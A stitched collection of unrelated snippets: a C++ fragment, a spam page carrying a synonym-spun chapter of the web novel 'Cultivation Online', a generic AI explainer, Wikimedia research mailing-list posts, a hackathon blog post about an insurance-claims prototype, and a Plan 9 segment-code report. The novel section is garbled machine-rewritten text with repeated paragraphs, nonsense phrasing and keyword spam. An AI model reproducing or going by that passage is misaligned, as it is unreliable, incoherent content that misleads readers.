template <typename T>
const Array2D<T>& CircularArray2D<T>::data() const
{
return m_Data;
}
}}
|
STACK_EDU
|
Fabulousnovel Cultivation Online update – Chapter 225 I’ll Take Them All ceaseless dinosaurs recommendation-p3
Incrediblefiction Cultivation Online online – Chapter 225 I’ll Take Them All idiotic bang suggest-p3
december love poetry
Novel–Cultivation Online–Cultivation Online
short ebook examples
Chapter 225 I’ll Take Them All compete knot
“Abide by me!”
A few minutes afterwards, Elder Bei delivered to the area with a significant container.
“Pay off?” Elder Bei checked out him with raised eye-brows before expressing, “You don’t be forced to pay everything. It’s all for free.”
“I see, so you’d overlooked, huh? Then let’s desire this incident will allow you to recall issues better down the road.” Elder Bei stated, and the man continuing following choosing a deep breathing, “Regardless of how the full predicament moved down, regardless of whether I wish to, I cannot guard you as you chosen to assault that disciple.”
“Y-You…” Elder Gu considered Elder Bei with disbelief as part of his sight plus a eliminating discomfort on his cheeks, but he didn’t dare to retaliate since he was far less strong than Elder Bei who was at the Spirit Become an expert in kingdom.
On his eye, Yuan was only in the 9th degree Heart Apprentice kingdom. Why would he want beast cores which are far above his amount?
A couple of moments later, Elder Bei given Yuan’s recognition badge returning to him and mentioned, “Thanks for your business.”
day of the dead 2022
“I see, so you’d neglected, huh? Then let’s pray this accident can help you consider points much better down the road.” Elder Bei explained, in which he carried on following going for a heavy inhale, “Regardless of how the full scenario gone straight down, even though I want to, I cannot defend you when you wanted to strike that disciple.”
anita blake flirt pdf
Yuan scratched his travel and said, “Frankly, I don’t fully grasp how many I want, but I’d similar to the best level monster core you possess.”
“Y-You…” Elder Gu looked over Elder Bei with disbelief in the sight in addition to a eliminating discomfort on his cheeks, but he didn’t dare to retaliate considering the fact that he was far weaker than Elder Bei who was on the Mindset Learn realm.
“The very best amount?” Elder Bei investigated him with wide eyeballs.
“Y-You…” Elder Gu considered Elder Bei with disbelief as part of his eyes plus a getting rid of discomfort on his cheeks, but he didn’t dare to retaliate since he was far weaker than Elder Bei who was for the Soul Expert kingdom.
When they have been external alongside another sect senior citizens, Elder Bei expected out loud, “Allow me to ask every one of you this— What does I explain to all of you at the beginning of this thirty day period?”
On the other hand, for the reason that Treasury Hallway has wronged Yuan, Elder Bei didn’t inquire him any questions and checked out the beast center guide.
“I-I needed neglected, Elder Bei…” Elder Gu quickly replied.
Yuan accepted his badge plus the monster cores, throwing them into his spatial diamond ring after.
“They all?” Elder Bei investigated Yuan by using a gawking manifestation on his face, wondering if this is Yuan’s approach to vengeance because they’d handled him wrongly.
“How many do you really need? And what stage can you choose for those Nature Warrior beast cores?”
Given that he already has a lot of participation issues, it would be a waste if he didn’t employ them while he would get every thing without cost.
|
OPCFW_CODE
|
Understanding Artificial Intelligence: A Simple Guide for Everyone: Artificial Intelligence, often abbreviated as AI, is a concept that’s becoming increasingly prevalent in our daily lives. But what exactly is artificial intelligence, and how does it impact us? In this article, we’ll delve into the basics of AI in simple terms, exploring its definition, applications, and potential implications for society.
Table of Contents
| Sr | Headings |
| 1 | What is Artificial Intelligence? |
| 2 | How Does Artificial Intelligence Work? |
| 3 | Types of Artificial Intelligence |
| 4 | Applications of Artificial Intelligence |
| 5 | Pros and Cons of Artificial Intelligence |
| 6 | Ethics and Artificial Intelligence |
| 7 | The Future of Artificial Intelligence |
| 8 | Common Misconceptions about AI |
| 9 | How to Get Started with AI |
| 10 | Conclusion |
Artificial Intelligence refers to the simulation of human intelligence processes by machines, particularly computer systems. It involves the creation of algorithms and systems that can perform tasks that typically require human intelligence, such as learning, problem-solving, and decision-making. In simpler terms, AI enables machines to mimic cognitive functions like reasoning, perception, and problem-solving.
At its core, AI relies on vast amounts of data and sophisticated algorithms to make decisions or perform tasks. These algorithms process data, identify patterns, and make predictions or decisions based on that information. Machine learning, a subset of AI, allows systems to improve their performance over time by learning from experience without being explicitly programmed.
Narrow AI, also known as Weak AI, is designed to perform specific tasks or solve particular problems. Examples include virtual assistants like Siri or Alexa, which are programmed to understand and respond to voice commands within predefined parameters.
General AI, or Strong AI, is a hypothetical form of AI that exhibits human-like intelligence and cognitive abilities. Unlike narrow AI, which is focused on specific tasks, general AI would have the capacity to understand, learn, and apply knowledge across a wide range of domains.
Artificial Intelligence finds applications across various industries and sectors, revolutionizing how we work, communicate, and live. Some common applications include:
AI is used in medical imaging, drug discovery, personalized medicine, and virtual health assistants to improve patient care and outcomes.
In finance, AI is utilized for fraud detection, algorithmic trading, customer service chatbots, and personalized financial recommendations.
Autonomous vehicles rely on AI for navigation, obstacle detection, and decision-making, aiming to enhance road safety and efficiency.
– Increased efficiency and productivity
– Automation of repetitive tasks
– Advancements in healthcare and diagnostics
– Job displacement due to automation
– Privacy and security concerns
– Ethical implications of AI decision-making
As AI becomes more integrated into society, ethical considerations become paramount. Issues such as bias in algorithms, data privacy, and the impact of AI on employment raise important ethical questions that need to be addressed.
The future of AI holds immense potential for innovation and transformation across various sectors. Advancements in areas like deep learning, natural language processing, and robotics are expected to drive further progress in AI capabilities.
AI will replace all human jobs.
In reality, AI is more likely to augment human capabilities rather than replace them entirely.
AI is only for tech-savvy individuals.
AI applications are becoming increasingly user-friendly and accessible to people from diverse backgrounds.
Interested in exploring AI? Start by learning the basics of programming languages like Python and familiarize yourself with machine learning concepts through online courses and tutorials. Experiment with open-source AI tools and datasets to gain hands-on experience.
In conclusion, artificial intelligence represents a transformative force that’s reshaping how we live, work, and interact with technology. By understanding the fundamentals of AI and its various applications, we can better navigate its evolving role in society.
FAQs (Frequently Asked Questions)
The main branches of AI include machine learning, natural language processing, computer vision, and robotics.
While AI can simulate certain aspects of human cognition, such as problem-solving and decision-making, it does not possess consciousness or emotions like humans.
The safety of AI depends on how it’s designed and implemented. Proper ethical guidelines and regulations are essential to ensure the responsible development and use of AI technologies.
Sci-fi scenarios aside, the idea of AI taking over the world is purely speculative. AI systems are created and controlled by humans, and their actions are ultimately governed by human oversight and regulation.
AI has the potential to benefit society in numerous ways, from improving healthcare outcomes and enhancing productivity to addressing environmental challenges and advancing scientific research.
Whether you’re curious about the basics of AI or contemplating its broader implications, this guide aims to provide a comprehensive yet accessible overview of artificial intelligence for everyone. So, dive in and explore the fascinating world of AI!
|
OPCFW_CODE
|
[You can safely skip this message if you have already seen it in the
Wikidata mailing list, and pardon for the spam]
TL;DR: soweego version 1 will be released soon. In the meanwhile, why
don't you consider endorsing the next steps?
This is a pre-release notification for early feedback.
Does the name *soweego* ring you a bell?
It is a machine learning-based pipeline that links Wikidata to large
It is a close friend of Mix'n'match , which mainly caters for small
The first version is almost done, and will start uploading results soon.
Confident links are going to feed Wikidata via a bot , while others
will get into Mix'n'match for curation.
The next short-term steps are detailed in a rapid grant proposal ,
and I would be really grateful if you could consider an endorsement there.
The soweego team has also tried its best to address the following
1. plan a sync mechanism between Wikidata and large catalogs / implement
checks against external catalogs to find mismatches in Wikidata;
2. enable users to add links to new catalogs in a reasonable time.
So, here is the most valuable contribution you can give to the project
right now: understand how to *import a new catalog* .
Can't wait for your reactions.
see past contributions:
as part of https://phabricator.wikimedia.org/T201165 the Analytics team
thought to reach out to everybody to make it clear that all the home
directories on the stat/notebook nodes are not backed up periodically. They
run on a software RAID configuration spanning multiple disks of course, so
we are resilient on a disk failure, but even if unlikely if might happen
that a host could loose all its data. Please keep this in mind when working
on important projects and/or handling important data that you care about.
I just added a warning to
If you have really important data that is too big to backup, keep in mind
that you can use your home directory (/user/your-username) on HDFS (that
replicates data three times across multiple nodes).
Please let us know if you have comments/suggestions/etc.. in the
Thanks in advance!
Luca (on behalf of the Analytics team)
TL;DR: In https://phabricator.wikimedia.org/T170826 the Analytics team
wants to add base firewall rules to stat100x and notebook100x hosts, that
will cause any non-localhost or known traffic to be blocked by default.
Please let us know in the task if this is a problem for you.
the Analytics team has always left the stat100x and notebook100x hosts
without a set of base firewall rules to avoid impacting any
research/test/etc.. activity on those hosts. This choice has a lot of
downsides, one of the most problematic ones is that usually environments
like the Python venvs can install potentially any package, and if the owner
does not pay attention to security upgrades then we may have a security
problem if the environment happens to bind to a network port and accept
traffic from anywhere.
One of the biggest problems was Spark: when somebody launches a shell using
Hadoop Yarn (--master yarn), a Driver component is created that needs to
bind to a random port to be able to communicate with the workers created on
the Hadoop cluster. We assumed that instructing Spark to use a predefined
range of random ports was not possible, but in
https://phabricator.wikimedia.org/T170826 we discovered that there is a way
(that seems to work fine from our tests). The other big use case that we
know, Jupyter notebooks, seems to require only localhost traffic flow
Please let us know in the task if you have a use case that requires your
environment to bind to a network port on stat100x or notebook100x and
accept traffic from other hosts. For example, having a python app that
binds to port 33000 on stat1007 and listens/accepts traffic from other stat
or notebook hosts.
If we don't hear anything, we'll start adding base firewall rules to one
host at the time during the upcoming weeks, tracking our work on the
Luca (on behalf of the Analytics team)
For those of you who are interested in "small" Wikipedias and Indigenous
languages, here's a new academic paper co-signed by yours truly.
Published in an open access journal :)
Nathalie Casemajor (Seeris)
*Openness, Inclusion and Self-Affirmation: Indigenous knowledge in Open
This paper is based on an action research project (Greenwood and Levin,
1998) conducted in 2016-2017 in partnership with the Atikamekw Nehirowisiw
Nation and Wikimedia Canada. Built into the educational curriculum of a
secondary school on the Manawan reserve, the project led to the launch of a
Wikipedia encyclopaedia in the Atikamekw Nehirowisiw language. We discuss
the results of the project by examining the challenges and opportunities
raised in the collaborative process of creating Wikimedia content in the
Atikamekw Nehirowisiw language. What are the conditions of inclusion of
Indigenous and traditional knowledge in open projects? What are the
cultural and political dimensions of empowerment in this relationship
between openness and inclusion? How do the processes of inclusion and
negotiation of openness affect Indigenous skills and worlding processes?
Drawing from media studies, indigenous studies and science and technology
studies, we adopt an ecological perspective (Star, 2010) to analyse the
complex relationships and interactions between knowledge practices,
ecosystems and infrastructures. The material presented in this paper is the
result of the group of participants’ collective reflection digested by one
Atikamekw Nehirowisiw and two settlers. Each co-writer then brings his/her
own expertise and speaks from what he or she knows and has been trained for.
Casemajor N., Gentelet K., Coocoo C. (2019), « Openness, Inclusion and
Self-Affirmation: Indigenous knowledge in Open Knowledge Projects », *Journal
of Peer Production*, no13, pp. 1-20.
More info about the Atikamekw Wikipetcia project and the involvement
of Wikimedia Canada:
I’m with a group of researchers <https://grouplens.org/> working on using
Artificial Intelligence (AI) tools to promote gender diversity in Wikipedia
contents and thus to close the gender gap
<https://en.wikipedia.org/wiki/Gender_bias_on_Wikipedia>. We want to build
a recommender system that targets the gender gap in content, while creating
personalized article recommendations for editors. To ensure that our tool
addresses real community issues, we plan to design the recommender
algorithms by incorporating the feedback from stakeholders in the
community, such as members of the WikiProject Women in Red, related
WikiProjects, and others who are concerned with this issue. We want to
understand your concerns and values as we come up with effective
For more details about our project, please refer to our Wikimedia project
If you are interested or have any thoughts and suggestions, please feel
free to reach out to me at bowen-yu(a)umn.edu and we can plan a time to
|
OPCFW_CODE
|
What is a sportsbook? A sportsbook is an establishment where you can place wagers on various sports events. These establishments accept clients from around the world and usually offer amenities such as HD televisions and parlay bets. The only difference between an online and a physical sportsbook is the way they operate. If you’re not sure what a sportsbook is, here are some of the benefits of online sportsbooks:
Online sportsbooks operate under the same principles as physical sportsbooks
While they may not be as widely available as their physical counterparts, online sportsbooks use the same principles to conduct their business. Like physical sportsbooks, online sportsbooks use software to display odds for different sporting events. Some have developed their own software, but for the most part, they pay a software company to run their business. The variety of sportsbooks available depends on the region they’re in. For example, European sportsbooks cater more to European bettors than their North American counterparts.
When depositing funds, most online sportsbooks charge the same fees as their physical counterparts. Users must enter a CVV2 code (which differs from card to card) when making a deposit. Depending on the sportsbook, they may also ask for confirmation of withdrawals before releasing money. It’s a good idea to deposit small amounts first to avoid disappointment later. Many sportsbooks also offer bonuses and promotions for customers who place bets on sports.
They accept clients from all over the world
A good sportsbook will have a variety of payment and withdrawal options. These options may include Visa, PayPal, Play+, and paper checks. Some sportsbooks may even offer cash at the casino cage. They should have a strong track record for protecting consumer information, as well as fast payouts. Signing up with a legal sportsbook is the easiest way to ensure your privacy and safety. However, be sure to read the terms and conditions of the sportsbook you choose to use before making a deposit or withdrawal.
They offer amenities like HD televisions
High-definition televisions (HDTVs) are excellent investments for healthcare facilities. HDTV prices have fallen significantly in the last few years, making them affordable for large-scale deployments. Healthcare facilities should consider the format of their content before purchasing HDTVs, because HD-formatted content delivers sharp, high-definition pictures. The right technology partner will help you focus on other opportunities. For example, choosing an HD formatted television can help improve the quality of the patient experience.
They accept parlay bets
A parlay bet is a multi-team wager that is made up of several smaller bets. The goal is to win all of these bets, but this strategy will increase your chances of losing if just one team wins. As a result, parlays are less likely to win in the long run than traditional bets, but they can be a lot of fun. But, it’s important to remember that you can’t win by placing small wagers on 10-team parlays.
The best sportsbooks will have multiple options for placing your bets. They will have a variety of wagers, such as sides, totals, futures, props, and more. You’ll also find sportsbooks that offer parlay cards. Whether these parlays are legal in your state will depend on how they operate. But, they all have some things in common. For instance, they pay out different amounts on parlays.
|
OPCFW_CODE
|
In this month’s Meet the Artist we have a talk with the talented 3D artist Daniel Zucco.
Meet Daniel Zucco
I was born and grew up in Tasmania, the beautiful island at the bottom of Australia, but moved to London 10 years ago now and I think of it as home. I always had a desire to move to Europe after my family took me on a 3-month holiday around Western Europe when I was a teenager. I was amazed by the fact that you could just jump on a plane or train and be in another country in an hour. For some perspective, the closest neighbouring country to Tasmania is a 7-hour flight.
I also loved the amount of diverse art you are exposed to when living in Europe, although MONA (Museum of Old and New Art) launched in Tasmania just after I left and is now attracting people from all over the world.
I currently live in London, which has been an incredible city to live in. It’s culturally diverse and there’s always something new to do or see. Before the pandemic, I would wander into the city every Saturday to see a one of the new, free exhibitions.
I am a 3D artist, passionate about generative design. Commercially, I work as a freelance Art Director collaborating with agencies and studios around the world, designing for global brands. My personal work on the other hand, focuses on exploring and designing generative art and pattern design which both generally influence my commercial work.
I studied Electronic Media at University of Tasmania – a degree centered around creating art with technology. For my honors project I designed an interactive film made in Flash that allowed a user to select random moving particles to construct their own edit of a prerecorded film. I think it was this project that started up my curiosity for randomness – which is now the basis of most of my work.
I tend to start most of my projects in Illustrator, working out the shapes, colours and the general rules of the piece. I often use Illustrator scripts to randomize elements of the designs. I also usually build everything on a single artboard if I’m going straight to 3D, or I’ll use multiple small artboards to design individual assets if I am going to continue developing the composition with coding software such Hype framework.
After settling on a design, I bring the Illustrator file into Cinema 4D using the Art Smart Plugin. I then use Mograph to further manipulate the design in 3D; randomizing the colours, position, rotation and scale of the individual elements. I sometimes animate the designs as I enjoy creating looped animations. I then work on light, texture and render the design in Octane.
I really enjoy designing the parameters to generate randomness and love building systems in 3D that enable me to quickly sort through 100’s of combinations of a single design. There is something about the process that seems to makes sense of the universe; being able to create simple rules that when combined make something highly complex.
My latest personal project is called “one hundred boxes”. I have designed 100 geometric designs that can be combined onto a canvas randomly. Each piece is able to rotate 90 degrees, four times, as well as move to any one of the one hundred positions on the artboard. These two rules alone mean that the amount of combinations I could make for this one piece of work would be greater than the amount of atoms in the universe, which I think is pretty cool.
I draw inspiration from lots of places but Instagram and Behance are my daily go-to for fresh inspiration. Some of my favorite artists who I follow on Instagram include Manoloide, Dimitri Cherniak, Anna Mac, PosterLad and Peter Tarka.
Instagram and Behance are my daily go-to for fresh inspiration
Looking ahead, I hope to continue exploring new ways of creating art and to make personal work more often.”
You can find me on Instagram, Behance and Esty.
|
OPCFW_CODE
|
You are an exceptional problem solver with great communication skills and are able to optimize our application in terms of technology and in delivering the best user experience. Your responsibilities will include translating design wireframes into the code that will produce visual elements of the application. You will have the opportunity to work with the latest tools, including [list your tech stack here]. You will play a key role in guiding our tech stack and will actively mentor your fellow developers. A front-end developer is a tech-savvy role that requires expertise in web design and involves translating customer needs into interactive web apps with visual elements that users see and interact with.
He creates websites that help organizations address business challenges and meet their requirements from development to project deployment. Subham has amazing communication skills and is professional in contributing individually and as a team. A front-end developer is responsible for designing and implementing the user interface of a website or web application.
A solid understanding of responsive design and cross-browser compatibility is essential to ensure that websites are accessible across various devices and platforms. Additionally, knowledge of version control systems like Git and experience with testing and debugging tools are valuable skills that contribute to a developer’s technical competence. Front-end developers focus on the visual layout, user interface/interaction, and user experience.
Akshay is an experienced content marketer, passionate about education and technology. With a love for travel, photography, and cricket, he brings a unique perspective to the edtech industry. Through engaging articles, he shares insights, trends, and inspires readers to embrace transformative edtech. Participate in open-source projects, which can provide valuable experience and exposure. We are committed to diversity and encourage all qualified candidates to apply. We do not discriminate based on race, color, religion, sex, national origin, age, disability, or any other status protected by law.
On a typical day, you can expect to to coach engineers to level up their technical and soft skills, to plan and scope future projects, and to help fix a small bug or guide a new feature development. UI is the graphical layout of an application that determines what each part of a site or application does and how it will look. “I’ve always found crafting polished user interactions that surprise and delight users to be the most rewarding and engaging task,” says Mari Batilando, a software engineer at Meta. “In order to do this, you need to both have an eye for detail and a rock-solid understanding of the platform.” Your software product will only be as good as how your frontend developers build it. To understand the frontend developer job description, we must first learn the nature of frontend development.
Choose The Right Software Development Program
- The right candidate will be responsible for the design and development of client-facing features.
- Visit our informative Frontend Developer hiring guide for additional insight.
- These qualifications are subject to change depending on the needs of a company or a team.
- That said, we provide our clients with software developers, QA testers, and other IT professionals that match their projects.
- Johnathan has 15 years of experience writing web apps that span consumer productivity software to mission-critical financial trading platforms.
There are technologies and knowledge that are common to all web developer jobs. A front-end web developer is probably what most people think of as a “web developer”. A front-end web developer is responsible for implementing visual elements that users see and interact with in a web application. They are usually supported by back-end web developers, who are responsible for server-side application logic and integration of the work front-end developers do. A front-end web developer is responsible for implementing visual and interactive elements that users engage with through their web browser when using a web application. They are usually supported by back-end web developers, who are responsible for server-side application logic and integration of the work front-end developers do.
Their primary goals are to raise user satisfaction, decrease user churn, and ensure user-based company goals are reached. Such goals might include increasing newsletter sign-ups, improving sales conversions, or identifying and removing pain points within an app. Nathan is a senior React engineer and an expert in streamlining UI/UX with React. front end developer courses As the lead design engineer at Motorola Solutions, he marshaled a product combining React, Angular, and Svelte to company-wide deployment, garnering more than 100,000 downloads. Nathan also developed Hypetrigger, a popular machine vision system for use with streaming services, and that is built with React and SolidJS for the front end.
|
OPCFW_CODE
|
If you’d like to try and use Linux without damaging your hard drive or your Windows partition, then this guide is for you. It will walk you through setting up Windows Ubuntu Installer (wubi) and also show you how to remove it in case you decide Linux is not for you.
You can download Windows Ubuntu Installer at the following link:
Once downloaded, run the wubi.exe file. You should see a screen like this:
Installation drive option is where you want to load all the Ubuntu files. If you only have one drive, then C: is your only option. If you have multiple drives and your C drive doesn’t exactly have enough space on it, you can send it to a different drive.
Installation size: This indicates how much space will be taken up by this Linux environment. Installation itself will fill up about 3 GB, therefore anything over will be used as free space for you to store applications, files, etc. Maximum storage is set to 30GB. 15GB is recommended for starters. If you don’t have a lot of space, choose 6 GB and that should be enough.
Desktop environment: The look and feel of different Linux desktops. By default, the desktop is called Gnome. But there are other variants such as Kde, Xfce and others. You can look these up online and see which ones you really like. A lot of people prefer KDE because of its eye candy, but my personal preference is Gnome because it’s very simple. Xfce is also very simple and lightweight. Therefore the list is as follows:
1) Ubuntu – gnome
2) Kubuntu – KDE
3) Xubuntu – Xfce
Language: English unless you prefer something different
Username and password: anything you like.
That’s all you have to do. The rest of the process is automated. The program will automatically go out and download the latest operating system (make sure you’re connected to the internet. It should complete in about 30 minutes depending on your connection speed. It will also modify your boot menu to add Ubuntu to it.
Next time you restart your computer you will see Windows and Ubuntu as boot choices. Choose Ubuntu and log in with the username and password you choose.
At this point you can begin exploring Ubuntu. You can also access your Windows files and store files from Ubuntu to those locations if you wish.
Wubi can be removed from Control panel just like any other program. This removal process will clean up your boot manager as well, so everything will go back to normal.
*Disclaimer: AVADirect and its Staff are not responsible for any damage to software/hardware, loss of data or personal injury by following our How-To guides. These guides are provided only as an aid to help you troubleshoot system problems. If you do not feel comfortable performing these steps its always best to send in your system to a local repair shop or contact an appropriate technical support line for additional assistance.
|
OPCFW_CODE
|
Winning wmn; 2023
Ah! This one has been pending on me for a long time. But as the cozy winters and holiday season are here I felt to wrap up things I wanted to finish this year. After all this year I was trying to push my boundaries and put myself in challenging situations. Putting my ideas and learnings into blogs also being one :p. Another such experiment was participating in a hackathon with no prep beforehand.
What was the challenge for me?
I'm mostly an introvert person and to speak up in front of even 10 people is daunting for me. Participating in a hackathon where I'll need to brainstorm ideas with unknown folks would be a bit outside my comfort zone. I had participated in hackathons during my undergrad days but had mostly worked alongside my college friends. Nonetheless, I channeled my inner coder strength to convince myself to participate and meet some tech-savvy women in the process. Yep, that was the motivation! :)
What was wmn;2023?
It was an onsite women only 24 hour long hackathon organised by Devfolio.
I was working at an insure-tech company back then and had some understanding of problems faced by Indian insurance companies and the gaps in customer expectations and insurance limitations while I was very impressed with the insurance systems in first world countries like Singapore. I thought of building a project on a similar idea. At the hackathon, I met a girl working in healthcare and we brainstormed our ideas for the prototype.
What did we build?
The idea was to solve the overall claims experience at the provider end i.e. insurance providers to be able to detect fraudulent claims and reject them as well as ensure an entire cashless flow from the customer's end without the manual intervention for customers to preserve the receipts from the consultation/treatment and uploading it later to get a reimbursement.
How was it solving the provider experience?
One of the major pain point of an insurance provider is to be able to detect a fraudulent claim. Especially in OPDs with low ticket size, the possibility of fraud increases even more and that is one of the reasons why insurance providers in India don't go for OPD included in the benefits. Another problem is data not being shared by different providers leads to a chance of duplicate claims.
How was it solving customers' experience?
OPD coverage - Most insurance providers in India do not provide OPD coverage. However, from the customers' point of view, this is the biggest economic cost center in health. With lesser possibility of frauds, insurance providers will be able to offer more holistic coverage including OPDs.
Cashless experience - Most of the insurances have a reimbursement flow and no coverage for OPD which leads to saving all the receipts, uploading them, and waiting for weeks for it to be approved.
Privacy of PII data - If there is a central system for storing all the health records, as a customer I should be able to control that data access. Each time an insurer requests my data, I should be able to control what document data I want to share, and only upon my authorization should that data be shared.
Adding a demo link for the project -
Video - https://www.loom.com/share/5d235242d6f14470ba1bbcb7830a8c96?sid=48fdd704-788b-4b80-82b4-d1cb63490b72
Project link - https://devfolio.co/projects/insurease-50a3
Winning the grand prize
And yeah that was it. After a really long time, I pushed myself to stay up for ~30 hrs to finish the prototype project as a solo developer. After all, it was about pushing my boundaries. I saw the announcement on twitter the next day. :)
|
OPCFW_CODE
|
5209R: MariaDB 5.5 vs 10.1
The MariaDB 10.1 PKG from the shop had some compatability issues. Here is how we fixed them.
Since a few months we've been offering a MariaDB-10.1 PKG in the BlueOnyx shop which replaced the CentOS 7 provided MariaDB-5.5 with MariaDB-10.1.
However: Several clients reported that their PHP applications then started exhibiting PHP error messages like this:
Headers and client library minor version mismatch.
After some investigation the issue became clear: This totally depends on which mechanism a PHP application uses in order to connect to MySQL/MariaDB:
Some are affected, some not. It also depends on how picky the PHP application is and (naturally) also on the error reporting that's configured for your PHP. Although both MariaDB versions use the same "libmysqlclient.so.18" there is of course a minor header difference, which can only be resolved by recompiling PHP against MariaDB-10.1.
Now a recompile is highly uncomfortable as it opens a can of worms. Not only would all shop PHP packages need a rebuild. No, we would also have to replace the CentOS provided "php-mysql" RPM with a version rebuilt against MariaDB-10.1. Which (in our experience) causes a ton of grief during future OS updates.
But here is the proper solution:
PHP has since long provided a replacement mechanism to allow MySQL access via PHP. Instead of compiling against the external MySQL client library we can use the MySQL drivers that ship with PHP. These are called "MySQL-nd".
CentOS 7 comes with two RPMs that provide MySQL/MariaDB support for PHP. Only one of them can be installed and you can't have both at the same time:
- php-mysql (which we used so far)
- php-mysqlnd (which we ought to use instead)
We just published a set of YUM updates for BlueOnyx 5209R which removes php-mysql and replaces it with php-mysqlnd.
As MySQL-nd is less picky about which version of MariaDB is installed this will solve the irritating header warning that some PHP applications used to throw.
Please note: You do not need to change anything in your PHP applications, as this should be a seamless update without any issues.
Meanwhile we are also rebuilting the latest PHP packages for 5209R in the BlueOnyx shop to use MySQL-nd. Updated PHP PKGs will become available later today (January 26th, 2017).
|
OPCFW_CODE
|
cannot mount routable engine to my consuming app
i try to mount an engine to my project as per the demo:
consuming app:
https://github.com/dgeb/ember-engines-demo
engine app:
https://github.com/dgeb/ember-blog-engine
the demo works well. But when i mount the ember-blog-engine to my own consuming app, error occurs and the error message is "Error: Could not find module ember-blog-engine/engine imported from (require)".
how i add the engine:
package.json
"dependencies": {
"ember-engines": "0.6.3",
"ember-blog-engine": "path-to/ember-blog-engine",
...
},
router.js
this.mount('ember-blog-engine', {as: 'blog'});
I add active-session.js and blog-data.js in services folder because those service is used by the demo engine.
app/app.js
engines: {
emberBlogEngine: {
dependencies: {
services: [
'blog-data',
{'session': 'active-session'}
]
}
}
}
I found the ember-blog-engine's source code is never built into vendor.js, when exec ember build , the console shows the engine is in dead module.
...
addon-tree-output/modules/ember-blog-engine/components/date-picker.js
addon-tree-output/modules/ember-blog-engine/config/environment.js
addon-tree-output/modules/ember-blog-engine/engine.js
addon-tree-output/modules/ember-blog-engine/initializers/hello.js
addon-tree-output/modules/ember-blog-engine/instance-initializers/hello-instance.js
addon-tree-output/modules/ember-blog-engine/routes.js
addon-tree-output/modules/ember-blog-engine/routes/application.js
addon-tree-output/modules/ember-blog-engine/routes/index.js
addon-tree-output/modules/ember-blog-engine/routes/new.js
addon-tree-output/modules/ember-blog-engine/routes/post.js
addon-tree-output/modules/ember-blog-engine/routes/post/comments.js
addon-tree-output/modules/ember-blog-engine/templates/application.js
addon-tree-output/modules/ember-blog-engine/templates/components/date-picker.js
addon-tree-output/modules/ember-blog-engine/templates/index.js
addon-tree-output/modules/ember-blog-engine/templates/new.js
addon-tree-output/modules/ember-blog-engine/templates/post.js
addon-tree-output/modules/ember-blog-engine/templates/post/comments.js
addon-tree-output/modules/ember-blog-engine/templates/post/index.js
...
dead 239
traversed 1347
You also need to add the engine to the consuming app in app/app.js so the app knows about the engine. IMO this isn't covered very well in the guides, should probably be in the "mounting an engine" section.
You also need to add the engine to the consuming app in app/app.js so the app knows about the engine. IMO this isn't covered very well in the guides, should probably be in the "mounting an engine" section.
Thanks for your reply. But I have put it in my app.js, it's my mistake that I forget this in the issue description. Have update the issue description.
@SuperManHa the ember-engines 0.6.x is compatible with ember-cli 2.18 or bigger - https://github.com/ember-engines/ember-engines/blob/master/config/ember-try.js#L15
please update ember-cli on your consuming app and try again
thanks!
Is this still an issue?
|
GITHUB_ARCHIVE
|
m: Venkatesh Srinivas <firstname.lastname@example.org>
Subject: GSoC Segments: What have I been doing, anyway?
Date: Mon, 16 Aug 2010 10:29:54 -0400
So GSoC is more or less over!
First, I really need to thank David Eckhardt and Erik Quanstrom for putting
up with me this summer; dealing with me can be as frustrating as pulling
teeth with a screwdriver when a patient only speaks another language. Next
time I see either/both of them, I owe them beer/non-alcohol-beverage or
pizza . Also, thanks to Devon for everything, including waiting over an
hour for me downtown.
I have been working on the segment code and making forays into libthread.
Let me first talk about what exactly I did, without talking about the
In Plan 9 fresh-out-of-the-box, a process's address space is constructed
from a series of segments, contiguous ranges of address space backed by the
same object. By default, a process has a small number of segments: a Text
segment, backed by the image, a Stack segment, backed by anonymous memory, a
Data segment to back the heap structure, and a BSS segment for the usual
purpose. Each process also has a small series of slots, currently 4, for
other segments, obtained via the segattach() system call and released via
the segdetach() syscall. When a process calls rfork(RFPROC), segments from
the "shared" class are shared across the fork and "memory" class segments
are copy-on-write across the fork; each process gets its own stack. When a
process calls rfork(RFMEM | RFPROC), all segments except the Stack segment
are maintained across the fork except the Stack segment. When a process
class exec(), segments marked with SG_CEXEC are detached; the rest are
inherited across the exec(). The Stack segment can never be inherited.
Across an rfork(RFMEM | RFPROC), new segattach()es and segdetach()es are not
visible - in Ron Minnich's terminology, we have shared memory, but not
shared address spaces.
First, I modified the segment slot structures, to lift the limit on four
user segments. I made the segment array dynamic, resized in segattach(). The
first few elements of the array are as in the current system, the special
Text, Data, BSS, and Stack segments. The rest of the segment array is
address-ordered, and searched via binary searches. The user/system interface
doesn't change, except that the limit on segment attaches is now from the
kernel memory allocator, rather than a fixed per-process limit.
I further changed segattach() to add more flags:
A segment with the SG_NONE flag set does not have a backing store. Any
accesses, read or write, cause a fault. This segment flag is useful for
placing red zones at user-desired addresses. It is an error to combine the
SG_NONE and SG_COMMIT flags.
A segment with the SG_COMMIT flag set is fully pre-faulted and its pages are
not considered by the swapper. An SG_COMMIT segment is maintained at commit
status across and exec() and rfork(RFMEM | RFPROC). If we are unable to
satisfy pre-faults for all of the pages of the segment in segattach(), we
cancel the attach. It is an error to combine the SG_COMMIT flag with
A segment attached with the SG_SAS flag appears in the address space of all
processes related to the current one by rfork(RFPROC | RFMEM). An SG_SAS
segment will not overlap a segment in any process related via rfork(RFMEM |
I finally changed libthread. Currently, libthread allocates thread stacks
via malloc()/free(). I converted libthread to allocate thread stacks via
segattach() - each thread stack consists of three segments, an anonymous
segment flanked by two SG_NONE redzones.
Currently I have posted a prototype (very generously called 'prototype')
implementation of the above interface to sources; the prototype kernel omits
a number of the checks claimed above. SG_SAS faults are not handled; SG_SAS
segments must be SG_COMMIT. SG_COMMIT has no limit, which makes it very easy
to crash a system by draining the page queue readily. The prototype
libthread is of considerably higher quality, I think, and would be usable a
production-grade implementation of these interfaces. The prototype kernel is
usable though - I have run it alone on my terminal for approximately a
However, the prototype kernel shows us that the interface can be implemented
efficiently - even when using three segattach()es per thread stack, creating
1024 threads took 2.25s real time on a 400MHz AMD K6, versus 0.87s realtime
with the original libthread and 9 kernel. Creating processes with thousands
of segments is not incredibly speedy, but it is workable and there is a lot
of low-hanging fruit that can improve performance.
The SG_SAS work is fairly unusual for Plan9 - each process originally had a
single, fixed-size segment slot array. Now, a process has a per-process
segment array and a second shared segment array. The shared array is
referenced by all processes created by rfork(RFMEM | RFPROC); the shares are
unlinked on exec() or rfork(RFPROC). The SG_SAS logic was added to match the
current semantics of thread stacks - as they are allocated by malloc() and
free() from the Data segment, they are visible across rfork(RFMEM | RFPROC);
